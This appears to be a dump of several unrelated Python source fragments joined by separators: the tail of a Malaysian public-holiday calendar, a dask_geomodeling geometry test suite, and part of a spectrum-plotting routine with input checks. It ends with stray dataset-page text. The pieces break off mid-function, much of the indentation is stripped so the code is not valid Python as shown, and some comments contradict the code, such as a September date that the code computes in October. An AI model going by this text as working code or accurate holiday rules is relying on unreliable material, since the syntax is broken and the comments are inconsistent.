self[hol_date - rd(days=1)] = "Arafat Day"
if self.subdiv in ("KDH", "KTN", "PLS", "TRG"):
# Second day
self[hol_date + rd(days=1)] = "Hari Raya Haji Holiday"
else:
for date_obs in _islamic_to_gre(year, 12, 10):
hol_date = date_obs
self[hol_date] = "Hari Raya Haji* (*estimated)"
if self.subdiv == "TRG":
# Arafat Day is one day before Eid al-Adha
self[hol_date - rd(days=1)] = "Arafat Day* (*estimated)"
if self.subdiv in ("KDH", "KTN", "PLS", "TRG"):
# Second day
self[
hol_date + rd(days=1)
] = "Hari Raya Haji Holiday* (*estimated)"
# Deepavali.
# aka Diwali;
# date of observance is announced yearly
if self.subdiv != "SWK":
dates_obs = {
2001: (NOV, 14),
2002: (NOV, 3),
2003: (OCT, 23),
2004: (NOV, 11),
2005: (NOV, 1),
2006: (OCT, 21),
2007: (NOV, 8),
2008: (OCT, 27),
2009: (OCT, 17),
2010: (NOV, 5),
2011: (OCT, 26),
2012: (NOV, 13),
2013: (NOV, 2),
2014: (OCT, 22),
2015: (NOV, 10),
2016: (OCT, 29),
2017: (OCT, 18),
2018: (NOV, 6),
2019: (OCT, 27),
2020: (NOV, 14),
2021: (NOV, 4),
2022: (NOV, 24),
}
if year in dates_obs:
hol_date = date(year, *dates_obs[year])
self[hol_date] = "Deepavali"
else:
hol_date = self.cnls.s_diwali_date(year)
self[hol_date] = "Deepavali* (*estimated; rarely on day after)"
# Christmas day.
self[date(year, DEC, 25)] = "Christmas Day"
# Malaysia Day.
self[date(year, SEP, 16)] = "Malaysia Day"
# ---------------------------------------------------------#
# Holidays from the Sarawak Ordinance (not included above) #
# ---------------------------------------------------------#
if self.subdiv == "SWK":
# Dayak Festival Day (the first day of June) and the following day.
self[date(year, JUN, 1)] = "Gawai Dayak"
self[date(year, JUN, 2)] = "Gawai Dayak (Second day)"
# The first day of May—Worker’s Celebration Day.
# Birthday of Tuan Yang Terutama Yang di-Pertua Negeri Sarawak (the
# second Saturday of September).
second_sat_oct = rrule(
MONTHLY,
dtstart=date(year, OCT, 1),
count=1,
bysetpos=2,
byweekday=SA,
)[0]
self[second_sat_oct] = "Birthday of the Governor of Sarawak"
# Sarawak Independence Day
if year > 2016:
self[date(year, JUL, 22)] = "Sarawak Day"
# Check for holidays that fall on a Sunday and
# implement Section 3 of Malaysian Holidays Act:
# "if any day specified in the Schedule falls on
# Sunday then the day following shall be a public
# holiday and if such day is already a public holiday,
# then the day following shall be a public holiday"
for (hol_date, hol_name) in list(self.items()):
if hol_date.year == year and hol_date.weekday() == SUN:
self[hol_date] += " [Sunday]"
in_lieu_date = hol_date + rd(days=+1)
while in_lieu_date in self:
in_lieu_date += rd(days=+1)
self[in_lieu_date] = hol_name + " [In lieu]"
# The last two days in May (Pesta Kaamatan).
# (Sarawak Act)
# Day | |
# File: dask_geomodeling/tests/test_geometry.py
import os
import unittest
from datetime import datetime as Datetime
from datetime import timedelta as Timedelta
from numpy.testing import assert_almost_equal
from osgeo import ogr
from pandas.util.testing import assert_series_equal
from shapely.geometry import box, Point, Polygon
import geopandas as gpd
import numpy as np
import pandas as pd
from dask import config
from dask_geomodeling.utils import Extent, get_sr, shapely_transform
from dask_geomodeling.tests.factories import (
setup_temp_root,
teardown_temp_root,
MockGeometry,
MockRaster,
)
from dask_geomodeling.geometry import aggregate
from dask_geomodeling.geometry import set_operations
from dask_geomodeling.geometry import field_operations
from dask_geomodeling.geometry import geom_operations
from dask_geomodeling.geometry import parallelize
from dask_geomodeling.geometry import merge
from dask_geomodeling.geometry import text
from dask_geomodeling import geometry
def create_geojson(abspath, polygons=10, bbox=None, ndim=2, projection="EPSG:4326"):
    """Create a GeoJSON file with (random) triangle polygons.

    Args:
        abspath: absolute path of the GeoJSON file to (re)create; any
            existing datasource at that path is deleted first.
        polygons: either an int (number of random triangles generated
            inside ``bbox``) or an iterable of coordinate sequences that
            are written as-is.
        bbox: flat (min..., max...) bounding box; required (and only
            used) when ``polygons`` is a scalar.
        ndim: number of coordinate dimensions for random generation.
        projection: spatial reference of the layer, e.g. "EPSG:4326".

    Returns:
        The polygon coordinates that were written (the generated ndarray
        when ``polygons`` was a scalar, otherwise the input unchanged).
    """
    driver = ogr.GetDriverByName("GeoJSON")
    # remove any previous result so the file is recreated from scratch
    driver.DeleteDataSource(abspath)
    datasource = driver.CreateDataSource(abspath)
    layer = datasource.CreateLayer(
        "results", get_sr(projection), geom_type=ogr.wkbPolygon
    )
    layer.CreateField(ogr.FieldDefn("name", ogr.OFTString))
    layer.CreateField(ogr.FieldDefn("id", ogr.OFTInteger))
    layer_definition = layer.GetLayerDefn()
    if np.isscalar(polygons):
        if bbox is None:
            raise ValueError("bbox is required when generating random polygons")
        # random triangles in the unit cube, scaled/shifted into bbox
        polygons = np.random.random((polygons, 3, ndim))
        bbox_min = np.asarray(bbox[:ndim])
        bbox_max = np.asarray(bbox[-ndim:])
        polygons = polygons * (bbox_max - bbox_min) + bbox_min
    for feature_id, coords in enumerate(polygons):
        ring = ogr.Geometry(ogr.wkbLinearRing)
        for coord in coords:
            ring.AddPoint_2D(*coord)
        ring.AddPoint_2D(*coords[0])  # close the ring
        polygon = ogr.Geometry(ogr.wkbPolygon)
        polygon.AddGeometry(ring)
        feature = ogr.Feature(layer_definition)
        feature.SetGeometry(polygon)
        feature.SetField("name", "test")
        # ids deliberately do not start at 0 so index mix-ups are caught
        feature.SetField("id", feature_id + 10)
        layer.CreateFeature(feature)
    layer.SyncToDisk()
    datasource.SyncToDisk()
    return polygons
class TestGeometryBlockAttrs(unittest.TestCase):
    """Tests properties that all geometry blocks share"""

    def test_attrs(self):
        """Every GeometryBlock subclass in geometry.py must define 'columns'."""
        missing = []
        for name, obj in geometry.__dict__.items():
            try:
                is_block = issubclass(obj, geometry.GeometryBlock)
            except TypeError:
                continue  # not a class at all
            if not is_block or obj is geometry.GeometryBlock:
                continue  # unrelated object, or the baseclass itself
            for attr in ("columns",):
                if not hasattr(obj, attr):
                    print(name, attr)
                    missing.append([name, attr])
        if len(missing) > 0:
            print(missing)
        self.assertEqual(0, len(missing))
class TestGeometryFileSource(unittest.TestCase):
    """Tests for GeometryFileSource reading features from a GeoJSON file."""
    @classmethod
    def setUpClass(cls):
        # one temporary directory shared by every test in this class
        cls.root = setup_temp_root()
        # paths
        cls.relpath = "test.json"
        cls.abspath = os.path.join(cls.root, "test.json")
        cls.url = "file://" + cls.abspath
    @classmethod
    def tearDownClass(cls):
        teardown_temp_root(cls.root)
    def setUp(self):
        """Write 10 random triangles inside the unit square before each test."""
        self.bbox = (0, 0, 1, 1)
        self.projection = "EPSG:4326"
        self.polygons = create_geojson(
            self.abspath, bbox=(0, 0, 1, 1), polygons=10, ndim=2, projection="EPSG:4326"
        )
        self.id_field = "id"
        self.source = geometry.GeometryFileSource(self.url, id_field="id")
    def test_attr(self):
        # constructor arguments are exposed unchanged as attributes
        self.assertEqual(self.source.url, self.url)
        self.assertEqual(self.source.path, self.abspath)
        self.assertEqual(self.source.id_field, self.id_field)
    def test_columns(self):
        self.assertSetEqual(self.source.columns, {"id", "name", "geometry"})
    def test_get_data(self):
        result = self.source.get_data(geometry=box(*self.bbox), projection="EPSG:4326")
        self.assertEqual(self.projection, result["projection"])
        self.assertEqual(10, len(result["features"]))
    def test_get_data_centroid_mode(self):
        # a triangle that intersects the bbox but whose centroid is outside it;
        # overwrites the setUp fixture file
        triangle = [[[0.8, 0.8], [2.0, 0.8], [2.0, 2.0]]]
        self.polygons = create_geojson(
            self.abspath,
            bbox=self.bbox,
            polygons=triangle,
            ndim=2,
            projection="EPSG:4326",
        )
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", mode="centroid"
        )
        # sanity checks on the fixture geometry itself
        self.assertTrue(Polygon(*self.polygons).intersection(box(*self.bbox)))
        self.assertFalse(Polygon(*self.polygons).centroid.within(box(*self.bbox)))
        self.assertEqual(self.projection, result["projection"])
        # in centroid mode the feature must therefore be excluded
        self.assertEqual(0, len(result["features"]))
    def test_reproject(self):
        # request in a different projection than the file's EPSG:4326
        extent = Extent(self.bbox, get_sr(self.projection))
        bbox3857 = extent.transformed(get_sr("EPSG:3857")).bbox
        result = self.source.get_data(geometry=box(*bbox3857), projection="EPSG:3857")
        self.assertEqual("EPSG:3857", result["projection"])
        self.assertEqual("epsg:3857", result["features"].crs["init"])
        self.assertEqual(10, len(result["features"]))
    def test_limit(self):
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", limit=3
        )
        self.assertEqual(3, len(result["features"]))
    def test_bbox(self):
        # overwrites the fixture with four hand-crafted polygons
        square = np.array([(0.5, 0.5), (0.5, 0.6), (0.6, 0.6), (0.6, 0.5)])
        outside = square + (1, 0)
        edge = square + (0.45, 0.0)
        # L shape just outside standard bbox (but envelope overlaps)
        corner = np.array(
            [(0.0, 2.0), (2.0, 2.0), (2.0, 0.0), (1.1, 0.0), (1.01, 1.1), (0.0, 1.1)]
        )
        create_geojson(
            self.abspath,
            polygons=(square, outside, edge, corner),
            projection="EPSG:4326",
        )
        # square and edge
        result = self.source.get_data(
            geometry=box(0.0, 0.0, 1.0, 1.0), projection="EPSG:4326"
        )
        self.assertEqual(2, len(result["features"]))
        # only square
        result = self.source.get_data(
            geometry=box(0.0, 0.0, 0.9, 1.0), projection="EPSG:4326"
        )
        self.assertEqual(1, len(result["features"]))
        # point request, check all 4 corners
        for x, y in [(0.5, 0.5), (0.5, 0.6), (0.6, 0.5), (0.6, 0.6)]:
            result = self.source.get_data(
                geometry=box(x, y, x, y), projection="EPSG:4326"
            )
            self.assertEqual(1, len(result["features"]))
        # point request, check just outside all 4 edges
        for x, y in [(0.49, 0.55), (0.61, 0.6), (0.55, 0.49), (0.6, 0.61)]:
            result = self.source.get_data(
                geometry=box(x, y, x, y), projection="EPSG:4326"
            )
            self.assertEqual(0, len(result["features"]))
    def test_size_filter(self):
        # one unit square and one much smaller polygon
        full = (0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0)
        small = (0.0, 0.0), (0.0, 0.1), (0.0, 0.1), (0.1, 0.0)
        create_geojson(self.abspath, (full, small))
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", min_size=1.1
        )
        self.assertEqual(0, len(result["features"]))
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", min_size=0.9
        )
        self.assertEqual(1, len(result["features"]))
        # no filter
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", min_size=0
        )
        self.assertEqual(2, len(result["features"]))
    def test_index(self):
        # the index column is named source.id_field
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", limit=1
        )
        self.assertEqual(self.source.id_field, result["features"].index.name)
    def test_properties(self):
        # all properties are produced from the file
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", limit=1
        )
        self.assertIn("name", result["features"].columns)
    def test_filters(self):
        # filtering returns the matching features
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(name="test")
        )
        self.assertEqual(10, len(result["features"]))
        # and does not return non-matching features
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(name="a")
        )
        self.assertEqual(0, len(result["features"]))
        # filters on non-existing fields are ignored
        result = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(a=1)
        )
        self.assertEqual(10, len(result["features"]))
        # attempting to use a django ORM expression raises ValueError
        request = dict(geometry=box(*self.bbox), filters={"name__in": ["tst"]})
        self.assertRaises(ValueError, self.source.get_data, **request)
    def test_extent_mode(self):
        result = self.source.get_data(geometry=box(*self.bbox), projection="EPSG:4326")
        expected_extent = tuple(result["features"].total_bounds)
        # extent matches the one obtained from the normal 'intersects' request
        result = self.source.get_data(
            mode="extent", geometry=box(*self.bbox), projection="EPSG:4326"
        )
        self.assertEqual("EPSG:4326", result["projection"])
        self.assertTupleEqual(expected_extent, result["extent"])
        # limit does not influence the extent
        result = self.source.get_data(
            mode="extent", geometry=box(*self.bbox), projection="EPSG:4326", limit=1
        )
        self.assertTupleEqual(expected_extent, result["extent"])
class TestSetOperations(unittest.TestCase):
    """Tests for set_operations (Intersection/Difference) and geom_operations.Area."""
    @classmethod
    def setUpClass(cls):
        cls.root = setup_temp_root()
        # paths
        cls.relpath = "test.json"
        cls.abspath = os.path.join(cls.root, "test.json")
        cls.url = "file://" + cls.abspath
    @classmethod
    def tearDownClass(cls):
        teardown_temp_root(cls.root)
    def setUp(self):
        # a 2x2 square source and an empty source, requested over a 1x1 bbox
        self.request = {
            "mode": "intersects",
            "projection": "EPSG:3857",
            "geometry": box(0, 0, 1, 1),
        }
        self.polygons = [((0.0, 0.0), (0.0, 2.0), (2.0, 2.0), (2.0, 0.0))]
        self.source = MockGeometry(self.polygons)
        self.empty = MockGeometry(polygons=[])
    def test_intersect_with_request(self):
        # Intersection with other=None clips against the request geometry
        view = set_operations.Intersection(self.source, None)
        # return only the intersection with the bbox
        result = view.get_data(**self.request)
        self.assertAlmostEqual(1.0, result["features"]["geometry"].iloc[0].area)
        # return the intersected extent
        self.request["mode"] = "extent"
        result = view.get_data(**self.request)
        self.assertTupleEqual((0.0, 0.0, 1.0, 1.0), result["extent"])
    def test_difference(self):
        # Define a second datasource to use in the difference operation
        other = MockGeometry(
            polygons=[((0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0))]
        )
        view = set_operations.Difference(self.source, other)
        # the request to other should have the source's extent as geometry
        _, (_, other_req) = view.get_sources_and_requests(**self.request)
        self.assertAlmostEqual(4.0, other_req["geometry"].area)
        # the result should be the difference between the two polygons
        result = view.get_data(**self.request)
        self.assertEqual(1, len(result["features"]))
        self.assertAlmostEqual(3.0, result["features"]["geometry"].iloc[0].area)
    def test_difference_with_empty_source(self):
        view = set_operations.Difference(self.empty, self.source)
        # there should be no requests as source is empty
        sources_and_requests = view.get_sources_and_requests(**self.request)
        self.assertEqual(1, len(sources_and_requests))
        self.assertIsNone(sources_and_requests[0][1])
        # the result should be empty
        result = view.get_data(**self.request)
        self.assertEqual(0, len(result["features"]))
    def test_difference_with_empty_other(self):
        view = set_operations.Difference(self.source, self.empty)
        # there should be requests as source was non-empty
        sources_and_requests = view.get_sources_and_requests(**self.request)
        self.assertEqual(2, len(sources_and_requests))
        self.assertIsNotNone(sources_and_requests[0][1])
        self.assertIsNotNone(sources_and_requests[1][1])
        # but the result should be unchanged
        result = view.get_data(**self.request)
        self.assertEqual(1, len(result["features"]))
        self.assertAlmostEqual(4.0, result["features"]["geometry"].iloc[0].area)
    def test_difference_different_id(self):
        # Define a second datasource that produces a geometry with different ID
        other = MockGeometry(
            polygons=[((0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0))],
            properties=[{"id": 21}],
        )
        view = set_operations.Difference(self.source, other)
        # the result should contain the original geometry, unchanged
        result = view.get_data(**self.request)
        self.assertEqual(1, len(result["features"]))
        self.assertAlmostEqual(4.0, result["features"]["geometry"].iloc[0].area)
    def test_area(self):
        view = geom_operations.Area(self.source, projection="EPSG:3857")
        result = view.get_data(**self.request)
        self.assertListEqual(result.tolist(), [Polygon(x).area for x in self.polygons])
    def test_area_reproject(self):
        # requesting in EPSG:4326 must still yield areas in the Area projection
        view = geom_operations.Area(self.source, projection="EPSG:3857")
        self.request["projection"] = "EPSG:4326"
        result = view.get_data(**self.request)
        np.testing.assert_almost_equal(
            result.tolist(), [Polygon(x).area for x in self.polygons]
        )
    def test_area_empty(self):
        view = geom_operations.Area(self.empty, projection="EPSG:3857")
        result = view.get_data(**self.request)
        self.assertEqual(0, len(result))
class TestConstructive(unittest.TestCase):
    """Tests for geometry.Simplify on top of a GeometryFileSource."""

    @classmethod
    def setUpClass(cls):
        cls.root = setup_temp_root()
        # paths
        cls.relpath = "test.json"
        cls.abspath = os.path.join(cls.root, "test.json")
        cls.url = "file://" + cls.abspath

    @classmethod
    def tearDownClass(cls):
        teardown_temp_root(cls.root)

    def setUp(self):
        self.bbox = (0, 0, 1, 1)
        self.projection = "EPSG:4326"
        self.id_field = "id"
        # simplification tolerance is taken from the request's min_size
        self.source = geometry.Simplify(
            geometry.GeometryFileSource(self.url, id_field="id"),
            tolerance=None,
            preserve_topology=False,
        )

    def _fetch(self, min_size):
        """Request both features with the given min_size; return geometries."""
        data = self.source.get_data(
            geometry=box(*self.bbox), projection="EPSG:4326", min_size=min_size
        )
        self.assertEqual(2, len(data["features"]))
        return data["features"].geometry.values

    def test_min_size_simplify(self):
        # two trapezoids whose short top edges have different widths
        trapezoid1 = (0.0, 0.0), (0.49, 1.0), (0.51, 1.0), (1.0, 0.0)
        trapezoid2 = (0.0, 0.0), (0.4, 1.0), (0.6, 1.0), (1.0, 0.0)
        create_geojson(self.abspath, (trapezoid1, trapezoid2))
        # min_size = None does not simplify: 5 exterior coords (incl. closure)
        geoms = self._fetch(None)
        self.assertEqual(5, len(geoms[0].exterior.coords))
        self.assertEqual(5, len(geoms[1].exterior.coords))
        # min_size = 0.05 should simplify only the first trapezoid
        geoms = self._fetch(0.05)
        self.assertEqual(4, len(geoms[0].exterior.coords))
        self.assertEqual(5, len(geoms[1].exterior.coords))
        # min_size = 0.2 should simplify both
        geoms = self._fetch(0.2)
        self.assertEqual(4, len(geoms[0].exterior.coords))
        self.assertEqual(4, len(geoms[1].exterior.coords))
class BufferTestCase(unittest.TestCase):
def test_buffer(self):
polygons = [((1, 1), (2, 1), (2, 2), (1, 2))]
source = geometry.Buffer(
MockGeometry(polygons), distance=1.0, projection="EPSG:3857", resolution=1
)
request = dict(
mode="intersects", projection="EPSG:3857", geometry=box(0, 0, 10, 10)
)
data = source.get_data(**request)
actual = data["features"].geometry.area
expected = pd.Series(7.0)
assert_series_equal(expected, actual, check_names=False)
def test_buffer_transform(self):
# Define a polygon in RD New (1 square meter).
polygon = (
(155000, 463000),
(155001, 463000),
(155001, 463001),
(155000, 463001),
)
# Apply a buffer of 10 cm.
| |
=====
datasets : pandas.DataFrame or dict
Dataset(s) with spectrum data. If more than one set,
datasets should be a dictionary with entries
<dataset_name>: dataset
fields : str, list, 'all' (or None)
Fieldname(s) corresponding to particular column(s) of
the datasets. fields can be None if input are Series.
'all' means all fields will be plotted (in this case all
datasets should have the same fields)
height : float (or None)
Height for which frequency spectra is plotted. If datasets
have no height dimension, height does not need to be specified.
times : str, int, float, list (or None)
Time(s) for which frequency spectra are plotted, specified as
either datetime strings or numerical values (seconds, e.g.,
simulation time). times can be None if all datasets combined
have no more than one time value.
fig : figure handle
Custom figure handle. Should be specified together with ax
ax : axes handle, or list or numpy ndarray with axes handles
Customand axes handle(s).
Size of ax should equal nfields * ntimes
fieldlimits : list or tuple, or dict
Value range for the various fields. If only one field is
plotted, fieldlimits can be a list or tuple. Otherwise, it
should be a dictionary with entries <fieldname>: fieldlimit.
Missing fieldlimits are set automatically
freqlimits : list or tuple
Frequency axis limits
fieldlabels : str or dict
Custom field labels. If only one field is plotted, fieldlabels
can be a string. Otherwise it should be a dictionary with
entries <fieldname>: fieldlabel
labelsubplots : bool, list or tuple
Label subplots as (a), (b), (c), ... If a list or tuple is given
their values should be the horizontal and vertical position
relative to each subaxis.
showlegend : bool (or None)
Label different plots and show legend. If None, showlegend is set
to True if legend will have more than one entry, otherwise it is
set to False.
ncols : int
Number of columns in axes grid, must be a true divisor of total
number of axes.
subfigsize : list or tuple
Standard size of subfigures
datasetkwargs : dict
Dataset-specific options that are passed on to the actual
plotting function. These options overwrite general options
specified through **kwargs. The argument should be a dictionary
with entries <dataset_name>: {**kwargs}
**kwargs : other keyword arguments
Options that are passed on to the actual plotting function.
Note that these options should be the same for all datasets,
fields and times, and they can not be used to set dataset,
field or time specific colors, limits, etc.
Example uses include setting linestyle/width, marker, etc.
"""
args = PlottingInput(
datasets=datasets,
fields=fields,
times=times,
fieldlimits=fieldlimits,
fieldlabels=fieldlabels,
)
nfields = len(args.fields)
ntimes = len(args.times)
ndatasets = len(args.datasets)
ntotal = nfields * ntimes
# Concatenate custom and standard field labels
# (custom field labels overwrite standard fields labels if existent)
args.fieldlabels = {**standard_spectrumlabels, **args.fieldlabels}
fig, ax, nrows, ncols = _create_subplots_if_needed(
ntotal,
ncols,
default_ncols=ntimes,
avoid_single_column=True,
sharex=True,
subfigsize=subfigsize,
wspace=0.3,
fig=fig,
ax=ax,
)
# Create flattened view of axes
axv = np.asarray(ax).reshape(-1)
# Set showlegend if not specified
if showlegend is None:
if ndatasets>1:
showlegend = True
else:
showlegend = False
# Loop over datasets, fields and times
for i, dfname in enumerate(args.datasets):
df = args.datasets[dfname]
frequencyvalues = _get_dim_values(df,'frequency',default_idx=True)
assert(frequencyvalues is not None), 'spectrum plot needs a frequency axis'
timevalues = _get_dim_values(df,'time')
# Create list with available fields only
available_fields = _get_available_fieldnames(df,args.fields)
for j, field in enumerate(args.fields):
# If available_fields is [None,], fieldname is unimportant
if available_fields == [None]:
pass
# Else, check if field is available
elif not field in available_fields:
print('Warning: field "'+field+'" not available in dataset '+dfname)
continue
for k, time in enumerate(args.times):
plotting_properties = {}
if showlegend:
plotting_properties['label'] = dfname
# Index of axis corresponding to field j and time k
axi = j*ntimes + k
# Axes mark up
if i==0 and ntimes>1:
axv[axi].set_title(pd.to_datetime(time).strftime('%Y-%m-%d %H%M UTC'),fontsize=16)
# Gather label, general options and dataset-specific options
# (highest priority to dataset-specific options, then general options)
try:
plotting_properties = {**plotting_properties,**kwargs,**datasetkwargs[dfname]}
except KeyError:
plotting_properties = {**plotting_properties,**kwargs}
# Get field spectrum
slice_t = _get_slice(df,time,'time')
slice_tz = _get_slice(slice_t,height,'height')
spectrum = _get_field(slice_tz,field).values
# Plot data
axv[axi].loglog(frequencyvalues[1:],spectrum[1:],**plotting_properties)
# Specify field limits if specified
try:
axv[axi].set_ylim(args.fieldlimits[field])
except KeyError:
pass
# Set frequency label
for c in range(ncols):
axv[ncols*(nrows-1)+c].set_xlabel('$f$ [Hz]')
# Specify field label if specified
for r in range(nrows):
try:
axv[r*ncols].set_ylabel(args.fieldlabels[args.fields[r]])
except KeyError:
pass
# Align labels
_align_labels(fig,axv,nrows,ncols)
# Set frequency limits if specified
if not freqlimits is None:
axv[0].set_xlim(freqlimits)
# Number sub figures as a, b, c, ...
if labelsubplots is not False:
try:
hoffset, voffset = labelsubplots
except (TypeError, ValueError):
hoffset, voffset = -0.14, -0.18
for i,axi in enumerate(axv):
axi.text(hoffset,voffset,'('+chr(i+97)+')',transform=axi.transAxes,size=16)
# Add legend
if showlegend:
leg = _format_legend(axv,index=ncols-1)
return fig, ax
# ---------------------------------------------
#
# DEFINITION OF AUXILIARY CLASSES AND FUNCTIONS
#
# ---------------------------------------------
class InputError(Exception):
    """Exception raised for errors in the input.

    ``super().__init__`` is called so the message is stored in ``args``,
    making ``str(exc)`` and tracebacks show the explanation (a bare
    attribute assignment would leave them empty).

    Attributes:
        message -- explanation of the error
    """
    def __init__(self, message):
        super().__init__(message)
        # kept as an attribute for callers that read .message directly
        self.message = message
class PlottingInput(object):
"""
Auxiliary class to collect input data and options for plotting
functions, and to check if the inputs are consistent
"""
supported_datatypes = (
pd.Series,
pd.DataFrame,
xr.DataArray,
xr.Dataset,
)
def __init__(self, datasets, fields, **argd):
# Add all arguments as class attributes
self.__dict__.update({'datasets':datasets,
'fields':fields,
**argd})
# Check consistency of all attributes
self._check_consistency()
def _check_consistency(self):
"""
Check consistency of all input data
"""
# ----------------------
# Check dataset argument
# ----------------------
# If a single dataset is provided, convert to a dictionary
# under a generic key 'Dataset'
if isinstance(self.datasets, self.supported_datatypes):
self.datasets = {'Dataset': self.datasets}
for dfname,df in self.datasets.items():
# convert dataset types here
if isinstance(df, (xr.Dataset,xr.DataArray)):
# handle xarray datatypes
self.datasets[dfname] = df.to_dataframe()
columns = self.datasets[dfname].columns
if len(columns) == 1:
# convert to pd.Series
self.datasets[dfname] = self.datasets[dfname][columns[0]]
else:
assert(isinstance(df, self.supported_datatypes)), \
"Dataset {:s} of type {:s} not supported".format(dfname,str(type(df)))
# ----------------------
# Check fields argument
# ----------------------
# If no fields are specified, check that
# - all datasets are series
# - the name of every series is either None or matches other series names
if self.fields is None:
assert(all([isinstance(self.datasets[dfname],pd.Series) for dfname in self.datasets])), \
"'fields' argument must be specified unless all datasets are pandas Series"
series_names = set()
for dfname in self.datasets:
series_names.add(self.datasets[dfname].name)
if len(series_names)==1:
self.fields = list(series_names)
else:
raise InputError('attempting to plot multiple series with different field names')
elif isinstance(self.fields,str):
# If fields='all', retrieve fields from dataset
if self.fields=='all':
self.fields = _get_fieldnames(list(self.datasets.values())[0])
assert(all([_get_fieldnames(df)==self.fields for df in self.datasets.values()])), \
"The option fields = 'all' only works when all datasets have the same fields"
# If fields is a single instance, convert to a list
else:
self.fields = [self.fields,]
# ----------------------------------
# Check match of fields and datasets
# ----------------------------------
# Check if all datasets have at least one of the requested fields
for dfname in self.datasets:
df = self.datasets[dfname]
if isinstance(df,pd.DataFrame):
assert(any([field in df.columns for field in self.fields])), \
'DataFrame '+dfname+' does not contain any of the requested fields'
elif isinstance(df,pd.Series):
if df.name is None:
assert(len(self.fields)==1), \
'Series must have a name if more than one fields is specified'
else:
assert(df.name in self.fields), \
'Series '+dfname+' does not match any of the requested fields'
# ---------------------------------
# Check heights argument (optional)
# ---------------------------------
try:
# If no heights are specified, check that all datasets combined have
# no more than one height value
if self.heights is None:
av_heights = set()
for df in self.datasets.values():
heightvalues = _get_dim_values(df,'height')
try:
for height in heightvalues:
av_heights.add(height)
except TypeError:
# heightvalues is None
pass
if len(av_heights)==0:
# None of the datasets have height values
self.heights = [None,]
elif len(av_heights)==1:
self.heights = list(av_heights)
else:
raise InputError("found more than one height value so 'heights' argument must be specified")
# If heights='all', retrieve heights from dataset
elif isinstance(self.heights,str) and self.heights=='all':
self.heights = _get_dim_values(list(self.datasets.values())[0],'height')
assert(all([np.allclose(_get_dim_values(df,'height'),self.heights) for df in self.datasets.values()])), \
"The option heights = 'all' only works when |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.